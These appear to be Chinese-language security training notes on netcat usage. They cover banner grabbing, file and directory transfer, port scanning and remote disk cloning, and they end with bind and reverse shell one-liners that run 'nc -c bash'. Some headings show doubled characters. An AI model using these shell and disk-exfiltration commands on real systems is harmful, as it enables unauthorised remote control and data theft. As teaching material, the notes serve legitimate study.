常用用工工具
经常使用用且功能强大大
安全从业者必不可少的帮手手
Nc / ncat
Wireshark
Tcpdump

NETCAT ——NC
网络工具中的瑞士军刀——小身身材、大大智慧
侦听模式 / 传输模式
telnet / 获取banner信息
传输文本信息
传输文件/目录
加密传输文件
远程控制/木⻢
加密所有流量
流媒体服务器
远程克隆硬盘

NC——TELNET / BANNER(作为客户端)
nc –nv 1.1.1.1 110
nc –nv 1.1.1.1 25
nc –nv 1.1.1.1 80
举例
1.连接邮件服务器端口
nc -vn 123.125.50.134 110
2.连接http
nc –nv ip 80

NC——传输文本信息
A:   nc -l -p 4444(服务端开启端口)
      netstat -pantu | grep 4444
B:   nc –nv ip 4444(客户端连接)

NC——远程电子取证信息收集
a:   nc -l -p 4444
b:   ls -l | nc -nv ip 4444

a:  nc -l -p 4444 > ps.txt
b:  ps aux | nc -nv ip 4444 -q 1(q执行完成之后延迟1s自动退出)

NC——传输文件/目录
1.传输文文件（注意文件的帧听端口与文件的传输方向）
A:nc -lp 333 > 1.mp4   （接受端口）
B:nc -nv ip  333 < 1.mp4 –q 1　　（输入端口）
或
A:nc -q 1 -lp 333 < a.mp4　　(发送端口)
B: nc -nv 1.1.1.1 333 > 2.mp4 　(输入端口)
2.传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1　（压缩发送）
B:nc -nv ip 333 | tar -xvf –　（接受解压）
3.加密传文文件
前提安装mcrypt
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4　　（接受端口）
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1　　（输入端口）
输入两次密码

NC——流媒体服务
前提安装mplayer
A: cat 1.mp4 | nc -lp 333　(服务器端)
B: nc -nv ip 333 | mplayer -vo x11 -cache 3000 -　(客户端)

NC——端口口扫描
1.nc使用tcp进行探测
nc -nvz ip 1-65535
2.nc使用udp进行探测
nc –vnzu 1.1.1.1 1-1024

NC——远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda　 (接受端口)
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1　(输入端口)
远程电子取证,可以将目标服务器硬盘远程复制,或者内存。

NC——远程控制
1.正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
2.反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
注:Windows用户把bash改成cmd;